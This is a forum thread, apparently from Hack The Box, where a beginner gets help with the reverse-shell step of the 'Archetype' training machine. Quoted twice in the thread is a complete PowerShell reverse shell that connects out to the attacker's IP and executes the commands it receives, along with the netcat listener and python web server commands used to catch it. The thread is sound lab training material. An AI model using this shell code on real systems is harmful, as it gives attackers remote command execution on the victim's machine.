ARCHETYPE listening on any 443 port

i having problem when i run sudo nc -lvnp 443 it types listening on any port

What is the problem?

problem is when i run command sudo nc -lvnp 443 it types listening on any port and i lunch script it types listening on [any] 443 …
connect to [10.10.14.159] from (UNKNOWN) [10.10.10.27] 49695
�j٨MTvt���*�,�+�0�/���$�#�(�’�
� ����=<5/
7

#�

Why is that a problem?

You run netcat, it acts as a listener. This is clearly working.

The listener has had a connection from a server on 10.10.10.27 but the data sent by the server isn’t something netcat easily understands.

How are you getting the server to connect to your listener? Are you sending binary data? Have you used a meterpreter payload? (if so you might be better using MSF to catch the shell).

no bro i didnt use msf

@GHOSTanonymus said:

no bro i didnt use msf

OK - is your python webserver getting a hit?

u think mssqlclient.py?

or python -m http.server 80

its all working on it

i watched many tutorials but nothing

Type your comment> @TazWake said:

Why is that a problem?

You run netcat, it acts as a listener. This is clearly working.

The listener has had a connection from a server on 10.10.10.27 but the data sent by the server isn’t something netcat easily understands.

How are you getting the server to connect to your listener? Are you sending binary data? Have you used a meterpreter payload? (if so you might be better using MSF to catch the shell).
problem is bro that it dont want to lunch shell

If you follow the instructions for Archetype, it says:

  • create shell.ps1 (it should be $client = New-Object System.Net.Sockets.TCPClient("YOURIP",443);$stream = $client.GetStream();[byte[]]$bytes = 0..65535|%{0};while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){;$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);$sendback = (iex $data 2>&1 | Out-String );$sendback2 = $sendback + "# ";$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()};$client.Close()
  • set up a python webserver with python3 -m http.server 80 (may need sudo)
  • set up your netcat listener sudo nc -lvnp 443
  • use the SQLi to call the shell.ps1 and invoke it (this triggers a content block on the HTB WAF so I am not going to paste it in here)

this is brainfuck for me

Just take it slow and make sure you are following every step in the walkthrough.

Its worth hitting websearches for anything you dont understand.

There are loads of online resources, and there is so much to cover in Pentesting/CTFs that no one knows everything.

Some links you might want to check (disclaimer : I haven’t checked any of these to know if they are any good).

https://www.sans.org/reading-room/whitepapers/testing/paper/266
https://www.tutorialspoint.com/penetration_testing/penetration_testing_introduction.htm

And I’d strongly recommend reading walkthroughs for retired boxes or watching Ippsec’s YouTube channel.

Pentesting/CTFs and “hacking” requires some background knowledge to get started. Dont be misled into thinking its just something you “do” with a couple of clicks. You need to understand what is happening on your system and the target system to have any hope.

If you follow the instructions for Archetype, it says:

create shell.ps1 (it should be $client = New-Object System.Net.Sockets.TCPClient(“YOURIP”,443);$stream = $client.GetStream();[byte[]]$bytes = 0…65535|%{0};while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){;$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);$sendback = (iex $data 2>&1 | Out-String );$sendback2 = $sendback + "# ";$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()};$client.Close()
set up a python webserver with python3 -m http.server 80 (may need sudo)
set up your netcat listener sudo nc -lvnp 443
use the SQLi to call the shell.ps1 and invoke it (this triggers a content block on the HTB WAF so I am not going to paste it in here)
Yes it is u do all u say

I think i need to run ufw command after sudo nc - lvnp 443

@GHOSTanonymus said:

I think i need to run ufw command after sudo nc - lvnp 443

Possibly but you appear to be getting a connection. The UFW command is to stop your Linux firewall blocking the reverse shell.

yeah bro my firewall is disabled

The same thing is also happening with my firewall is disabled, Netcat listener is set up , the server is also but nothing happens after running on the netcat listener .I have been banging my head on this for 2 days watched tutorial after tutorials but no cure for my problem

i solved this bro